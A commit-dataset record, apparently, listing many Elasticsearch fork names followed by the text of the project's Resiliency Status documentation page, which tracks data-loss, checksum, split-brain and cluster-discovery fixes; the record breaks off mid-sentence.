walkman\/elasticsearch,Ansh90\/elasticsearch,caengcjd\/elasticsearch,Uiho\/elasticsearch,caengcjd\/elasticsearch,glefloch\/elasticsearch,sarwarbhuiyan\/elasticsearch,mjhennig\/elasticsearch,sc0ttkclark\/elasticsearch,strapdata\/elassandra-test,ZTE-PaaS\/elasticsearch,franklanganke\/elasticsearch,gfyoung\/elasticsearch,wuranbo\/elasticsearch,amaliujia\/elasticsearch,amit-shar\/elasticsearch,YosuaMichael\/elasticsearch,overcome\/elasticsearch,queirozfcom\/elasticsearch,zkidkid\/elasticsearch,ThalaivaStars\/OrgRepo1,jbertouch\/elasticsearch,fernandozhu\/elasticsearch,smflorentino\/elasticsearch,chrismwendt\/elasticsearch,kimimj\/elasticsearch,jw0201\/elastic,kevinkluge\/elasticsearch,amit-shar\/elasticsearch,coding0011\/elasticsearch,drewr\/elasticsearch,Collaborne\/elasticsearch,liweinan0423\/elasticsearch,NBSW\/elasticsearch,ThalaivaStars\/OrgRepo1,petmit\/elasticsearch,jprante\/elasticsearch,cwurm\/elasticsearch,luiseduardohdbackup\/elasticsearch,Siddartha07\/elasticsearch,heng4fun\/elasticsearch,lchennup\/elasticsearch,nezirus\/e
lasticsearch,himanshuag\/elasticsearch,spiegela\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,diendt\/elasticsearch,aglne\/elasticsearch,mrorii\/elasticsearch,camilojd\/elasticsearch,Kakakakakku\/elasticsearch,sarwarbhuiyan\/elasticsearch,AshishThakur\/elasticsearch,Stacey-Gammon\/elasticsearch,episerver\/elasticsearch,winstonewert\/elasticsearch,IanvsPoplicola\/elasticsearch,JackyMai\/elasticsearch,areek\/elasticsearch,kunallimaye\/elasticsearch,Ansh90\/elasticsearch,humandb\/elasticsearch,vrkansagara\/elasticsearch,rhoml\/elasticsearch,Microsoft\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,liweinan0423\/elasticsearch,Microsoft\/elasticsearch,tcucchietti\/elasticsearch,ThalaivaStars\/OrgRepo1,truemped\/elasticsearch,pozhidaevak\/elasticsearch,mute\/elasticsearch,sjohnr\/elasticsearch,nellicus\/elasticsearch,dylan8902\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,humandb\/elasticsearch,phani546\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,sdauletau\/elasticsearch,vrkansagara\/elasticsearch,HonzaKral\/elasticsearch,dylan8902\/elasticsearch,kkirsche\/elasticsearch,yynil\/elasticsearch,jw0201\/elastic,obourgain\/elasticsearch,markharwood\/elasticsearch,Brijeshrpatel9\/elasticsearch,JSCooke\/elasticsearch,kkirsche\/elasticsearch,MisterAndersen\/elasticsearch,hanst\/elasticsearch,overcome\/elasticsearch,brandonkearby\/elasticsearch,hafkensite\/elasticsearch,Brijeshrpatel9\/elasticsearch,masterweb121\/elasticsearch,mbrukman\/elasticsearch,xuzha\/elasticsearch,knight1128\/elasticsearch,mrorii\/elasticsearch,combinatorist\/elasticsearch,kcompher\/elasticsearch,slavau\/elasticsearch,martinstuga\/elasticsearch,Clairebi\/ElasticsearchClone,andrestc\/elasticsearch,scottsom\/elasticsearch,zeroctu\/elasticsearch,ThalaivaStars\/OrgRepo1,elasticdog\/elasticsearch,hechunwen\/elasticsearch,socialrank\/elasticsearch,weipinghe\/elasticsearch,mm0\/elasticsearch,spiegela\/elasticsearch,heng4fun\/elasticsearch,djschny\/elasticsearch,weipinghe\/elasticsearch,socialrank\/elasticsearch,lzo\/elasticsearch-1,diendt\/elasticsearch,coding0011\/elasticsearch,sreeramjayan\/elasticsearch,palecur\/elasticsearch,rlugojr\/elasticsearch,snikch\/elasticsearch,jpountz\/elasticsearch,AndreKR\/elasticsearch,fernandozhu\/elasticsearch,Microsoft\/elasticsearch,PhaedrusTheGreek\/elasticsearch,drewr\/elasticsearch,jango2015\/elasticsearch,wimvds\/elasticsearch,Stacey-Gammon\/elasticsearch,mrorii\/elasticsearch,Siddartha07\/elasticsearch,KimTaehee\/elasticsearch,fforbeck\/elasticsearch,a2lin\/elasticsearch,Liziyao\/elasticsearch,iamjakob\/elasticsearch,mbrukman\/elasticsearch,szroland\/elasticsearch,Rygbee\/elasticsearch,sscarduzio\/elasticsearch,MichaelLiZhou\/elasticsearch,pritishppai\/elasticsearch,Siddartha07\/elasticsearch,weipinghe\/elasticsearch,tsohil\/elasticsearch,strapdata\/elassandra,ImpressTV\/elasticsearch,loconsolutions\/elasticsearch,humandb\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mortonsykes\/elasticsearch,C-Bish\/elasticsearch,Brijeshrpatel9\/elasticsearch,markllama\/elasticsearch,MaineC\/elasticsearch,mapr\/elasticsearch,markharwood\/elasticsearch,snikch\/elasticsearch,mbrukman\/elasticsearch,IanvsPoplicola\/elasticsearch,gmarz\/elasticsearch,tsohil\/elasticsearch,rajanm\/elasticsearch,schonfeld\/elasticsearch,jaynblue\/elasticsearch,ulkas\/elasticsearch,kunallimaye\/elasticsearch,amaliujia\/elasticsearch,Microsoft\/elasticsearch,elancom\/elasticsearch,jimhooker2002\/elasticsearch,MetSystem\/elasticsearch,SergVro\/elastic
search,robin13\/elasticsearch,sposam\/elasticsearch,LeoYao\/elasticsearch,adrianbk\/elasticsearch,golubev\/elasticsearch,rento19962\/elasticsearch,yynil\/elasticsearch,JervyShi\/elasticsearch,mmaracic\/elasticsearch,pranavraman\/elasticsearch,kevinkluge\/elasticsearch,Shekharrajak\/elasticsearch,feiqitian\/elasticsearch,kaneshin\/elasticsearch,petabytedata\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,Liziyao\/elasticsearch,mute\/elasticsearch,lmtwga\/elasticsearch,elasticdog\/elasticsearch,18098924759\/elasticsearch,Charlesdong\/elasticsearch,hirdesh2008\/elasticsearch,s1monw\/elasticsearch,hanst\/elasticsearch,xingguang2013\/elasticsearch,winstonewert\/elasticsearch,ESamir\/elasticsearch,AleksKochev\/elasticsearch,kubum\/elasticsearch,acchen97\/elasticsearch,clintongormley\/elasticsearch,JackyMai\/elasticsearch,nellicus\/elasticsearch,cwurm\/elasticsearch,clintongormley\/elasticsearch,koxa29\/elasticsearch,javachengwc\/elasticsearch,hanst\/elasticsearch,Widen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,bestwpw\/elasticsearch,zeroctu\/elasticsearch,opendatasoft\/elasticsearch,wittyameta\/elasticsearch,drewr\/elasticsearch,hanswang\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,petabytedata\/elasticsearch,wimvds\/elasticsearch,bawse\/elasticsearch,fernandozhu\/elasticsearch,KimTaehee\/elasticsearch,Uiho\/elasticsearch,markwalkom\/elasticsearch,zhiqinghuang\/elasticsearch,jango2015\/elasticsearch,btiernay\/elasticsearch,schonfeld\/elasticsearch,kalburgimanjunath\/elasticsearch,overcome\/elasticsearch,masterweb121\/elasticsearch,fooljohnny\/elasticsearch,EasonYi\/elasticsearch,kenshin233\/elasticsearch,ZTE-PaaS\/elasticsearch,tcucchietti\/elasticsearch,jimhooker2002\/elasticsearch,btiernay\/elasticsearch,franklanganke\/elasticsearch,bestwpw\/elasticsearch,sreeramjayan\/elasticsearch,PhaedrusTheGreek\/elasticsearch,HarishAtGitHub\/elasticsearch,feiqitian\/elasticsearch,fred84\/elasticsearch,JervyShi\/elasticsearch,strapdata\/elassandra,polyfractal\/elasticsearch,AleksKochev\/elasticsearch,gingerwizard\/elasticsearch,golubev\/elasticsearch,Widen\/elasticsearch,slavau\/elasticsearch,kalburgimanjunath\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,fernandozhu\/elasticsearch,zhiqinghuang\/elasticsearch,KimTaehee\/elasticsearch,winstonewert\/elasticsearch,sc0ttkclark\/elasticsearch,ImpressTV\/elasticsearch,zkidkid\/elasticsearch,feiqitian\/elasticsearch,lydonchandra\/elasticsearch,wayeast\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,yynil\/elasticsearch,kcompher\/elasticsearch,wangtuo\/elasticsearch,sposam\/elasticsearch,Rygbee\/elasticsearch,combinatorist\/elasticsearch,diendt\/elasticsearch,beiske\/elasticsearch,vingupta3\/elasticsearch,HarishAtGitHub\/elasticsearch,Clairebi\/ElasticsearchClone,strapdata\/elassandra,vrkansagara\/elasticsearch,polyfractal\/elasticsearch,likaiwalkman\/elasticsearch,mgalushka\/elasticsearch,wbowling\/elasticsearch,springning\/elasticsearch,Uiho\/elasticsearch,sjohnr\/elasticsearch,Collaborne\/elasticsearch,kenshin233\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,Uiho\/elasticsearch,wuranbo\/elasticsearch,drewr\/elasticsearch,fekaputra\/elasticsearch,GlenRSmith\/elasticsearch,Clairebi\/ElasticsearchClone,VukDukic\/elasticsearch,areek\/elasticsearch,sdauletau\/elasticsearch,truemped\/elasticsearch,karthikjaps\/elasticsearch,strapdata\/elassandra5-rc,jbertouch\/elasticsearch,gingerwizard\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,uschindler\/elasticsearch,i
nfusionsoft\/elasticsearch,apepper\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,milodky\/elasticsearch,yongminxia\/elasticsearch,jw0201\/elastic,camilojd\/elasticsearch,ImpressTV\/elasticsearch,mjhennig\/elasticsearch,fred84\/elasticsearch,easonC\/elasticsearch,fekaputra\/elasticsearch,GlenRSmith\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mm0\/elasticsearch,MjAbuz\/elasticsearch,kunallimaye\/elasticsearch,a2lin\/elasticsearch,fooljohnny\/elasticsearch,coding0011\/elasticsearch,ouyangkongtong\/elasticsearch,apepper\/elasticsearch,andrejserafim\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,wenpos\/elasticsearch,jprante\/elasticsearch,vvcephei\/elasticsearch,Shekharrajak\/elasticsearch,artnowo\/elasticsearch,Widen\/elasticsearch,i-am-Nathan\/elasticsearch,nknize\/elasticsearch,wbowling\/elasticsearch,vingupta3\/elasticsearch,F0lha\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,qwerty4030\/elasticsearch,smflorentino\/elasticsearch,SergVro\/elasticsearch,yanjunh\/elasticsearch,fred84\/elasticsearch,yanjunh\/elasticsearch,mortonsykes\/elasticsearch,alexbrasetvik\/elasticsearch,HarishAtGitHub\/elasticsearch,yuy168\/elasticsearch,Liziyao\/elasticsearch,naveenhooda2000\/elasticsearch,nellicus\/elasticsearch,likaiwalkman\/elasticsearch,martinstuga\/elasticsearch,bawse\/elasticsearch,Fsero\/elasticsearch,gmarz\/elasticsearch,beiske\/elasticsearch,springning\/elasticsearch,YosuaMichael\/elasticsearch,codebunt\/elasticsearch,wbowling\/elasticsearch,a2lin\/elasticsearch,xuzha\/elasticsearch,cnfire\/elasticsearch-1,spiegela\/elasticsearch,hechunwen\/elasticsearch,hanswang\/elasticsearch,jimczi\/elasticsearch,iamjakob\/elasticsearch,luiseduardohdbackup\/elasticsearch,djschny\/elasticsearch,ckclark\/elasticsearch,iamjakob\/elasticsearch,codebunt\/elasticsearch,yongminxia\/elasticsearch,beiske\/elasticsearch,himanshuag\/elasticsearch,luiseduardohdbackup\/elasticsearch,kubum\/elasticsearch,Shepard1212\/elasticsearch,AshishThakur\/elasticsearch,achow\/elasticsearch,scorpionvicky\/elasticsearch,javachengwc\/elasticsearch,luiseduardohdbackup\/elasticsearch,girirajsharma\/elasticsearch,fforbeck\/elasticsearch,linglaiyao1314\/elasticsearch,adrianbk\/elasticsearch,kkirsche\/elasticsearch,javachengwc\/elasticsearch,JervyShi\/elasticsearch,jw0201\/elastic,gfyoung\/elasticsearch,sdauletau\/elasticsearch,NBSW\/elasticsearch,NBSW\/elasticsearch,mohit\/elasticsearch,gmarz\/elasticsearch,sneivandt\/elasticsearch,nrkkalyan\/elasticsearch,overcome\/elasticsearch,zeroctu\/elasticsearch,aglne\/elasticsearch,gfyoung\/elasticsearch,kkirsche\/elasticsearch,rajanm\/elasticsearch,jaynblue\/elasticsearch,btiernay\/elasticsearch,karthikjaps\/elasticsearch,jchampion\/elasticsearch,zeroctu\/elasticsearch,TonyChai24\/ESSource,adrianbk\/elasticsearch,Chhunlong\/elasticsearch,cwurm\/elasticsearch,slavau\/elasticsearch,janmejay\/elasticsearch,sauravmondallive\/elasticsearch,achow\/elasticsearch,wenpos\/elasticsearch,achow\/elasticsearch,JervyShi\/elasticsearch,andrestc\/elasticsearch,khiraiwa\/elasticsearch,kalburgimanjunath\/elasticsearch,easonC\/elasticsearch,MjAbuz\/elasticsearch,avikurapati\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,amaliujia\/elasticsearch,ckclark\/elasticsearch,rlugojr\/elasticsearch,chirilo\/elasticsearch,awislowski\/elasticsearch,IanvsPoplicola\/elasticsearch,dataduke\/elasticsearch,MichaelLiZhou\/elasticsearch,slavau\/elasticsearch,iantruslove\/elasticsearch,Flipkart\/elasticsearch,thecocce\/elasticsearch,sreeramjayan\/elasticsearch,mjhennig\/elasticsearch,jpr
ante\/elasticsearch,amit-shar\/elasticsearch,huanzhong\/elasticsearch,lchennup\/elasticsearch,wenpos\/elasticsearch,hafkensite\/elasticsearch,shreejay\/elasticsearch,humandb\/elasticsearch,schonfeld\/elasticsearch,Siddartha07\/elasticsearch,knight1128\/elasticsearch,feiqitian\/elasticsearch,masaruh\/elasticsearch,onegambler\/elasticsearch,mcku\/elasticsearch,glefloch\/elasticsearch,wangyuxue\/elasticsearch,tcucchietti\/elasticsearch,LewayneNaidoo\/elasticsearch,micpalmia\/elasticsearch,VukDukic\/elasticsearch,socialrank\/elasticsearch,easonC\/elasticsearch,khiraiwa\/elasticsearch,dantuffery\/elasticsearch,ImpressTV\/elasticsearch,davidvgalbraith\/elasticsearch,thecocce\/elasticsearch,YosuaMichael\/elasticsearch,LewayneNaidoo\/elasticsearch,xingguang2013\/elasticsearch,scorpionvicky\/elasticsearch,tsohil\/elasticsearch,weipinghe\/elasticsearch,kevinkluge\/elasticsearch,btiernay\/elasticsearch,strapdata\/elassandra5-rc,abibell\/elasticsearch,rmuir\/elasticsearch,rhoml\/elasticsearch,HarishAtGitHub\/elasticsearch,Asimov4\/elasticsearch,henakamaMSFT\/elasticsearch,vietlq\/elasticsearch,kevinkluge\/elasticsearch,18098924759\/elasticsearch,mikemccand\/elasticsearch,andrejserafim\/elasticsearch,pablocastro\/elasticsearch,mjhennig\/elasticsearch,abibell\/elasticsearch,Rygbee\/elasticsearch,codebunt\/elasticsearch,liweinan0423\/elasticsearch,Stacey-Gammon\/elasticsearch,jchampion\/elasticsearch,snikch\/elasticsearch,kunallimaye\/elasticsearch,sreeramjayan\/elasticsearch,jimhooker2002\/elasticsearch,Shekharrajak\/elasticsearch,easonC\/elasticsearch,yuy168\/elasticsearch,vroyer\/elasticassandra,sc0ttkclark\/elasticsearch,ZTE-PaaS\/elasticsearch,StefanGor\/elasticsearch,pritishppai\/elasticsearch,MaineC\/elasticsearch,truemped\/elasticsearch,rmuir\/elasticsearch,JackyMai\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,zhiqinghuang\/elasticsearch,palecur\/elasticsearch,strapdata\/elassandra5-rc,jimhooker2002\/elasticsearch,yynil\/elasticsearch,lmtwga\/elasticsearch,masterweb121\/elasticsearch,pozhidaevak\/elasticsearch,onegambler\/elasticsearch,MichaelLiZhou\/elasticsearch,JackyMai\/elasticsearch,xuzha\/elasticsearch,chirilo\/elasticsearch,markllama\/elasticsearch,vrkansagara\/elasticsearch,xingguang2013\/elasticsearch,naveenhooda2000\/elasticsearch,likaiwalkman\/elasticsearch,AshishThakur\/elasticsearch,nomoa\/elasticsearch,hirdesh2008\/elasticsearch,milodky\/elasticsearch,Clairebi\/ElasticsearchClone,wayeast\/elasticsearch,s1monw\/elasticsearch,davidvgalbraith\/elasticsearch,AleksKochev\/elasticsearch,skearns64\/elasticsearch,clintongormley\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jsgao0\/elasticsearch,tahaemin\/elasticsearch,mcku\/elasticsearch,hafkensite\/elasticsearch,pranavraman\/elasticsearch,kenshin233\/elasticsearch,slavau\/elasticsearch,MetSystem\/elasticsearch,lchennup\/elasticsearch,jango2015\/elasticsearch,ckclark\/elasticsearch,yuy168\/elasticsearch,vietlq\/elasticsearch,smflorentino\/elasticsearch,i-am-Nathan\/elasticsearch,humandb\/elasticsearch,jchampion\/elasticsearch,Shepard1212\/elasticsearch,kenshin233\/elasticsearch,sjohnr\/elasticsearch,winstonewert\/elasticsearch,artnowo\/elasticsearch,Chhunlong\/elasticsearch,strapdata\/elassandra5-rc,smflorentino\/elasticsearch,mbrukman\/elasticsearch,smflorentino\/elasticsearch,vietlq\/elasticsearch,vingupta3\/elasticsearch,kalburgimanjunath\/elasticsearch,MetSystem\/elasticsearch,ydsakyclguozi\/elasticsearch,ivansun1010\/elasticsearch,Chhunlong\/elasticsearch,opendatasoft\/elasticsearch,khiraiwa\/elasticsearch,sneivandt\/elasticse
arch,ulkas\/elasticsearch,huypx1292\/elasticsearch,javachengwc\/elasticsearch,dongjoon-hyun\/elasticsearch,rlugojr\/elasticsearch,TonyChai24\/ESSource,mjason3\/elasticsearch,sscarduzio\/elasticsearch,ESamir\/elasticsearch,GlenRSmith\/elasticsearch,LeoYao\/elasticsearch,palecur\/elasticsearch,markharwood\/elasticsearch,kingaj\/elasticsearch,mohit\/elasticsearch,hafkensite\/elasticsearch,tkssharma\/elasticsearch,lzo\/elasticsearch-1,micpalmia\/elasticsearch,linglaiyao1314\/elasticsearch,petmit\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mmaracic\/elasticsearch,thecocce\/elasticsearch,truemped\/elasticsearch,bestwpw\/elasticsearch,vroyer\/elasticassandra,kevinkluge\/elasticsearch,micpalmia\/elasticsearch,adrianbk\/elasticsearch,Charlesdong\/elasticsearch,codebunt\/elasticsearch,mute\/elasticsearch,snikch\/elasticsearch,lmtwga\/elasticsearch,Fsero\/elasticsearch,henakamaMSFT\/elasticsearch,wimvds\/elasticsearch,mnylen\/elasticsearch,ThalaivaStars\/OrgRepo1,kalburgimanjunath\/elasticsearch,spiegela\/elasticsearch,hydro2k\/elasticsearch,jw0201\/elastic,LeoYao\/elasticsearch,hirdesh2008\/elasticsearch,awislowski\/elasticsearch,anti-social\/elasticsearch,jeteve\/elasticsearch,Charlesdong\/elasticsearch,karthikjaps\/elasticsearch,caengcjd\/elasticsearch,markharwood\/elasticsearch,mnylen\/elasticsearch,socialrank\/elasticsearch,wbowling\/elasticsearch,janmejay\/elasticsearch,MjAbuz\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch,gmarz\/elasticsearch,alexbrasetvik\/elasticsearch,beiske\/elasticsearch,alexbrasetvik\/elasticsearch,camilojd\/elasticsearch,wangtuo\/elasticsearch,dpursehouse\/elasticsearch,lydonchandra\/elasticsearch,nilabhsagar\/elasticsearch,alexshadow007\/elasticsearch,kimimj\/elasticsearch,JackyMai\/elasticsearch,F0lha\/elasticsearch,rmuir\/elasticsearch,iantruslove\/elasticsearch,elasticdog\/elasticsearch,wangtuo\/elasticsearch,jango2015\/elasticsearch,cnfire\/elasticsearch-1,kunallimaye\/elasticsearch,myelin\/elasticsearch,liweinan0423\/elasticsearch,opendatasoft\/elasticsearch,iacdingping\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,koxa29\/elasticsearch,LeoYao\/elasticsearch,kunallimaye\/elasticsearch,janmejay\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,phani546\/elasticsearch,yuy168\/elasticsearch,adrianbk\/elasticsearch,mm0\/elasticsearch,MjAbuz\/elasticsearch,kalburgimanjunath\/elasticsearch,jaynblue\/elasticsearch,Fsero\/elasticsearch,wittyameta\/elasticsearch,heng4fun\/elasticsearch,gingerwizard\/elasticsearch,iacdingping\/elasticsearch,vroyer\/elassandra,mute\/elasticsearch,skearns64\/elasticsearch,jimhooker2002\/elasticsearch,dataduke\/elasticsearch,djschny\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,schonfeld\/elasticsearch,mgalushka\/elasticsearch,ckclark\/elasticsearch,himanshuag\/elasticsearch,shreejay\/elasticsearch","old_file":"docs\/resiliency\/index.asciidoc","new_file":"docs\/resiliency\/index.asciidoc","new_contents":"= Resiliency Status\n\n:JIRA: https:\/\/issues.apache.org\/jira\/browse\/LUCENE-\n:GIT: https:\/\/github.com\/elasticsearch\/elasticsearch\/issues\/\n\n== Overview\n\nThe team at Elasticsearch is committed to continuously improving both\nElasticsearch and Apache Lucene to protect your data. As with any distributed\nsystem, Elasticsearch is complex and has many moving parts, each of which can\nencounter edge cases that require proper handling. Our resiliency project is\nan ongoing effort to find and fix these edge cases. 
If you want to keep up\nwith this project on GitHub, see our issues list under the tag\nhttps:\/\/github.com\/elasticsearch\/elasticsearch\/issues?q=label%3Aresiliency[resiliency].\n\nWhile GitHub is great for sharing our work, it can be difficult to get an\noverview of the current state of affairs and the previous work that has been\ndone from an issues list. This page provides an overview of all the\nresiliency-related issues that we are aware of, improvements that have already\nbeen made, and current in-progress work. We\u2019ve also listed some historical\nimprovements throughout this page to provide the full context.\n\nIf you\u2019re interested in more detail on how we approach resiliency in\nElasticsearch, see Igor Motov\u2019s recent talk\nhttp:\/\/www.elasticsearch.org\/videos\/improving-elasticsearch-resiliency\/[Improving Elasticsearch Resiliency].\n\nYou may also be interested in our blog post\nhttp:\/\/www.elasticsearch.org\/blog\/resiliency-elasticsearch\/[Resiliency in Elasticsearch],\nwhich details our thought processes when addressing resiliency in both\nElasticsearch and the work our developers do upstream in Apache Lucene.\n\n== Data Store Recommendations\n\nSome customers use Elasticsearch as a primary datastore, some set up\ncomprehensive backup solutions using features such as our Snapshot and\nRestore, while others use Elasticsearch in conjunction with a data storage\nsystem like Hadoop or even flat files. Elasticsearch can be used for so many\ndifferent use cases, which is why we have created this page to make sure you\nare fully informed when you are architecting your system.\n\n== Work in Progress\n\n[float]\n=== Known Unknowns (STATUS: ONGOING)\n\nWe consider this topic to be the most important in our quest for\nresiliency. We put a tremendous amount of effort into testing\nElasticsearch to simulate failures and randomize configuration to\nproduce extreme conditions. In addition, our users are an important\nsource of information on unexpected edge cases and your bug reports\nhelp us make fixes that ensure that our system continues to be\nresilient.\n\nIf you encounter an issue, https:\/\/github.com\/elasticsearch\/elasticsearch\/issues[please report it]!\n\nWe are committed to tracking down and fixing all the issues that are posted.\n\n[float]\n=== Loss of documents during network partition (STATUS: ONGOING)\n\nIf a network partition separates a node from the master, there is some window of time before the node detects it. The length of the window depends on the type of partition. This window is extremely small if a socket is broken. More adversarial partitions, for example ones that silently drop requests without breaking the socket, can take longer (up to 3x30s using current defaults).\n\nIf the node hosts a primary shard at the moment of partition, and ends up being isolated from the cluster (which could have resulted in {GIT}2488[split-brain] before), some documents that are being indexed into the primary may be lost if they fail to reach one of the allocated replicas (due to the partition) and that replica is later promoted to primary by the master. See {GIT}7572[#7572].\n\nA test to replicate this condition was added in {GIT}7493[#7493].\n\n[float]\n=== Prevent use of known-bad Java versions (STATUS: ONGOING)\n\nCertain versions of the JVM are known to have bugs which can cause index corruption. 
{GIT}7580[#7580] prevents Elasticsearch startup if known bad versions are in use.\n\n[float]\n=== Lucene checksums phase 2 (STATUS: ONGOING)\n\nWhen Lucene opens a segment for reading, it validates the checksum on the smaller segment files -- those which it reads entirely into memory -- but not the large files like term frequencies and positions, as this would be very expensive. During merges, term vectors and stored fields are validated, as long as the segments being merged come from the same version of Lucene. Checksumming for term vectors and stored fields is important because merging consists of performing optimized byte copies. Term frequencies, term positions, payloads, doc values, and norms are currently not checked during merges, although Lucene provides the option to do so. These files are less prone to silent corruption as they are actively decoded during merge, and so are more likely to throw exceptions if there is any corruption.\n\nThere are a few ongoing efforts to improve coverage:\n\n* {GIT}7360[#7360] validates checksums on all segment files during merges. (STATUS: DONE, fixed in 1.4.0.Beta1)\n* {JIRA}5842[LUCENE-5842] validates the structure of the checksum footer of the postings lists, doc values, stored fields and term vectors when opening a new segment, to ensure that these files have not been truncated. (STATUS: DONE, Fixed in Lucene 4.10 and 1.4.0.Beta1)\n* {JIRA}5894[LUCENE-5894] lays the groundwork for extending more efficient checksum validation to all files during optimized bulk merges, if possible. (STATUS: ONGOING, Fixed in Lucene 5.0)\n* {GIT}7586[#7586] adds checksums for cluster and index state files. (STATUS: ONGOING, fixed in 1.5.0)\n\n[float]\n=== Add per-segment and per-commit ID to help replication (STATUS: ONGOING)\n\n{JIRA}5895[LUCENE-5895] adds a unique ID for each segment and each commit point. File-based replication (as performed by snapshot\/restore) can use this ID to know whether the segment\/commit on the source and destination machines are the same. Fixed in Lucene 5.0.\n\n[float]\n=== Improving Zen Discovery (STATUS: ONGOING)\n\nRecovery from failure is a complicated process, especially in an asynchronous distributed system like Elasticsearch. With several processes happening in parallel, it is important to ensure that recovery proceeds swiftly and safely. While fixing the {GIT}2488[split-brain issue] we have been hunting down corner cases that were not handled optimally, adding tests to demonstrate the issues, and working on fixes:\n\n* Faster & better detection of master & node failures, including not trying to reconnect upon disconnect, failing on disconnect errors during ping, and verifying cluster names in pings. Previously, Elasticsearch had to wait a bit for the node to complete the process required to join the cluster. Recent changes guarantee that a node has fully joined the cluster before we start the fault detection process. Therefore we can do an immediate check, causing faster detection of errors and validation of cluster state after a minimum master node breach. {GIT}6706[#6706], {GIT}7399[#7399] (STATUS: DONE, v1.4.0.Beta1)\n* Broaden unicast pinging when the master fails: When a node loses its current master, it will start pinging to find a new one. Previously, when using unicast-based pinging, the node would ping a set of predefined nodes asking them whether the master had really disappeared or whether there was a network hiccup. Now, we ping all nodes in the cluster to increase coverage. 
In the case that all unicast hosts are disconnected from the current master during a network failure, this improvement is essential to allow the cluster to reform once the partition is healed. {GIT}7336[#7336] (STATUS: DONE, v1.4.0.Beta1)\n* After joining a cluster, validate that the join was successful and that the master has been set in the local cluster state. {GIT}6969[#6969]. (STATUS: DONE, v1.4.0.Beta1)\n* Write additional tests that use the test infrastructure to verify proper behavior during network disconnections and garbage collections. {GIT}7082[#7082] (STATUS: ONGOING)\n* Make write calls return the number of total\/successful\/missing shards in the same way that we do in search, which ensures transparency in the consistency of write operations. {GIT}7572[#7572]. (STATUS: ONGOING)\n\n[float]\n=== Validate quorum before accepting a write request (STATUS: ONGOING)\n\nToday, when a node holding a primary shard receives an index request, it checks the local cluster state to see whether a quorum of shards is available before it accepts the request. However, it can take some time before an unresponsive node is removed from the cluster state. We are adding an optional live check, where the primary node tries to contact its replicas to confirm that they are still responding before accepting any changes. See {GIT}6937[#6937].\n\nWhile the work is going on, we tightened the current checks by bringing them closer to the index code. See {GIT}7873[#7873]. (STATUS: DONE, fixed in 1.4.0)\n\n[float]\n=== Jepsen Test Failures (STATUS: ONGOING)\n\nWe have increased our test coverage to include scenarios tested by Jepsen. We make heavy use of randomization to expand on the scenarios that can be tested and to introduce new error conditions. You can follow the work on the master branch of the https:\/\/github.com\/elasticsearch\/elasticsearch\/blob\/master\/src\/test\/java\/org\/elasticsearch\/discovery\/DiscoveryWithServiceDisruptions.java[`DiscoveryWithServiceDisruptions` class], where we will add more tests as time progresses.\n\n[float]\n=== Document guarantees and handling of failure (STATUS: ONGOING)\n\nThis status page is a start, but we can do a better job of explicitly documenting the processes at work in Elasticsearch, and what happens in the case of each type of failure. The plan is to have a test case that validates each behavior under simulated conditions. Every test will document the expected results, the associated test code, and an explicit PASS or FAIL status for each simulated case.\n\n[float]\n=== Take filter cache key size into account (STATUS: ONGOING)\n\nCommonly used filters are cached in Elasticsearch. That cache is limited in size (10% of the node's memory by default) and entries are evicted based on a least-recently-used policy. The amount of memory used by the cache depends on two primary components: the values it stores and the keys associated with them. Calculating the memory footprint of the values is easy enough, but accounting for the keys is trickier, as they are, by default, raw Lucene objects. This is largely not a problem as the keys are dominated by the values. However, recent optimizations in Lucene have changed the balance, causing the filter cache to grow beyond its intended size.\n\nWhile we are working on a longer-term solution, we introduced a minimum weight of 1k for each cache entry. This puts an effective limit on the number of entries in the cache. 
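\n\nFor reference, the overall size bound of the filter cache is itself configurable. A sketch for elasticsearch.yml, assuming the 1.x-era node filter cache setting name (the value shown is the default; this complements, rather than replaces, the per-entry minimum weight):\n\n[source,yaml]\n--------------------------------------------------\nindices.cache.filter.size: 10%\n--------------------------------------------------\n\n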
The minimum-weight change is tracked in {GIT}8304[#8304]. (STATUS: DONE, fixed in 1.4.0)\n\n== Completed\n\n[float]\n=== Don't allow unsupported codecs (STATUS: DONE, v1.4.0.Beta1)\n\nLucene 4 added a number of alternative codecs for experimentation purposes, and Elasticsearch exposed the ability to change codecs. Since then, Lucene has settled on the best choice of codec and provides backwards compatibility only for the default codec. {GIT}7566[#7566] removes the ability to set alternate codecs.\n\n[float]\n=== Use checksums to identify entire segments (STATUS: DONE, v1.4.0.Beta1)\n\nA hash collision makes it possible for two different files to have the same length and the same checksum. Instead, a segment's identity should rely on checksums from all of the files in a single segment, which greatly reduces the chance of a collision. This change has been merged ({GIT}7351[#7351]).\n\n[float]\n=== Fix ``Split Brain can occur even with minimum_master_nodes'' (STATUS: DONE, v1.4.0.Beta1)\n\nEven when `minimum_master_nodes` is set, split brain can still occur under certain conditions, e.g. disconnection between master-eligible nodes, which can lead to data loss. The scenario is described in detail in {GIT}2488[issue 2488]:\n\n* Introduced a new testing infrastructure to simulate different types of node disconnections, including loss of network connection, lost messages, message delays, etc. See {GIT}5631[MockTransportService] support and {GIT}6505[service disruption] for more details. (STATUS: DONE, v1.4.0.Beta1)\n* Added tests that 